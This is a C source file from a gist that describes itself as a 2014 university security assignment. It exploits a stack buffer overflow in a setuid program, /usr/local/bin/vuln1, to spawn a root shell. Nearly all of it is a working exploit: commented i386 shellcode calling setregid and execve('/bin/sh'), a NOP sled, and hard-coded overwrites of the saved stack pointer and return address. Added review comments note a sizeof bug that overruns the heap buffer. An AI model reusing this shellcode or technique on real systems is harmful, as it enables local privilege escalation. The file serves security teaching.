@bountin
Created May 24, 2014 12:57
Using a stack overflow to spawn a root shell off a setuid executable - University assignment of Internet Security 1 in the summer term of 2014
#include <stdio.h> // printf
#include <stdlib.h> // malloc
#include <string.h> // strlen strncpy
#include <unistd.h> //execl
/* The byte repeated to form the padding run ('\220' is 0x90, the x86 NOP). */
char nop = '\220';
/*
 * i386 payload that travels inside the target's argument string.  The
 * per-line comments are the author's own disassembly of each byte group;
 * the trailing "/bin/sh " and "---" are data, which the author's comments
 * describe as being reached through the jmp/call/pop sequence below.
 * Nothing in this file validates these bytes against the target — they
 * only make sense for the one binary named in main().
 */
char *shellcode =
// setregid(-1, 201)
"\x29\xc0" // subl %eax, %eax
"\xb0\x47" // movb $71, %al <-- Syscall 71 = setregid
"\x29\xdb" // subl %ebx, %ebx <-- Nullify first parameter
"\xb3\xc9" // movb $201, %bl <-- Second param: group => 201 (built in ebx first ...)
"\x89\xd9" // movl %ebx, %ecx <-- Now the second param is in place
"\x29\xdb" // subl %ebx, %ebx <-- Again nullify first parameter
"\x83\xeb\x01" // subl $1, %ebx <-- First param: user => -1 (= no change)
"\xcd\x80" // int $0x80
// Preparations of the shell execution
"\xeb\x1f" // jmp 0x1f <-- 1) Go to the last call stmt to get the address of the string
"\x5e" // popl %esi <-- and ff. all that address finding fun
"\x89\x76\x08" // movl %esi,0x8(%esi)
"\x31\xc0" // xorl %eax,%eax
"\x88\x46\x07" // movb %eax,0x7(%esi)
"\x89\x46\x0c" // movl %eax,0xc(%esi)
// execve("/bin/sh", "sh")
"\xb0\x0b" // movb $0xb,%al <-- Syscall 11 = execve
"\x89\xf3" // movl %esi,%ebx <-- First param: address of the /bin/sh string
"\x8d\x4e\x08" // leal 0x8(%esi),%ecx <-- Second param: argv[0] = program name = sh
"\x8d\x56\x0c" // leal 0xc(%esi),%edx <-- Third param: null pointer
"\xcd\x80" // int $0x80 <-- Kernel mode!
// exit(0)
"\x31\xdb" // xorl %ebx,%ebx <-- First param: 0
"\x89\xd8" // movl %ebx,%eax
"\x40" // inc %eax <-- Syscall 1 = exit
"\xcd\x80" // int $0x80 <-- Kernel mode!
"\xe8\xdc\xff\xff\xff" // call -0x24 <-- 1) Go back to the normal program run
// "/bin/grade"
"/bin/sh "
"---";
/*
 * Entry point: builds the over-long argument for /usr/local/bin/vuln1 and
 * replaces this process with that program via execl().
 *
 * Bytes written into evil_argument, in order: a run of `nop` bytes, the
 * shellcode string, 106 filler bytes, one "length" byte, 9 filler bytes,
 * a 4-byte value the author labels the saved stack pointer, a 4-byte value
 * the author labels the saved eip, and a terminating NUL.
 *
 * Every count and both 4-byte values are tied to one fixed stack layout of
 * that specific target binary; nothing here discovers them at run time.
 * Address-space randomisation, a non-executable stack or a stack canary
 * each break that assumption — presumably disabled on the course target,
 * which this file does not show.
 *
 * NOTE(review): `void main` is non-standard C; int main(int, char **) is
 * the portable signature.
 * NOTE(review): `sizeof shellcode` is the size of a char pointer, not of
 * the string, so argument_size does not account for the payload length.
 * The stores below add up to nops + strlen(shellcode) + 106 + 1 + 9 + 4 +
 * 4 + 1 = 310 bytes (nops + strlen is fixed at 185), while the allocation
 * is argument_size + 1 = 319 - strlen(shellcode) + sizeof(char *) bytes;
 * for this payload the writes run past the malloc'd block — undefined
 * behaviour in this program itself.
 */
void main(int argc, char* argv[]) {
    int i;
    int offset = 0;
    /* The NOP run pads the payload to a fixed 185 bytes; strlen() returns
     * size_t, so the loop bound goes wrong if the string ever exceeds 185. */
    int nops = 185 - strlen(shellcode);
    int argument_size = nops + sizeof shellcode + 106 + 1 + 8 + 4 + 4 + 10;
    char* evil_argument = malloc(argument_size +1);
    if (evil_argument == NULL) {
        printf("malloc failed");
        exit(1);
    }
    // Prepare the nop sledge
    for (i=0; i<nops; i++) {
        evil_argument[offset++] = nop;
    }
    // Add shellcode.  With strlen(shellcode) as the bound, strncpy copies
    // exactly the string bytes and no terminator — a plain memcpy in effect.
    strncpy(&evil_argument[nops], shellcode, strlen(shellcode));
    offset += strlen(shellcode);
    // Add 106 Bytes filler
    for (i=0; i<106; i++) {
        evil_argument[offset++] = '.';
    }
    // Length stack element ('\52' is 42, i.e. '*')
    evil_argument[offset++] = '\52';
    // Filler: the original comment said 8 bytes, but the loop writes 9
    for (i=0; i<9; i++) {
        evil_argument[offset++] = '.';
    }
    // 4 hard-coded bytes the author labels the saved stack pointer
    strncpy(&evil_argument[offset], "\250\365\377\277", 4);
    offset += 4;
    // 4 hard-coded bytes the author labels the saved eip.  The original
    // comment quoted a different value than the literal; the literal is
    // what gets written.
    strncpy(&evil_argument[offset], "\xe0\xf4\xff\xbf", 4);
    offset += 4;
    evil_argument[offset++] = '\0';
    // execl() returns only on failure; that case is neither reported nor
    // turned into a non-zero exit status here.
    execl ("/usr/local/bin/vuln1", "/usr/local/bin/vuln1", evil_argument, (char *)NULL);
}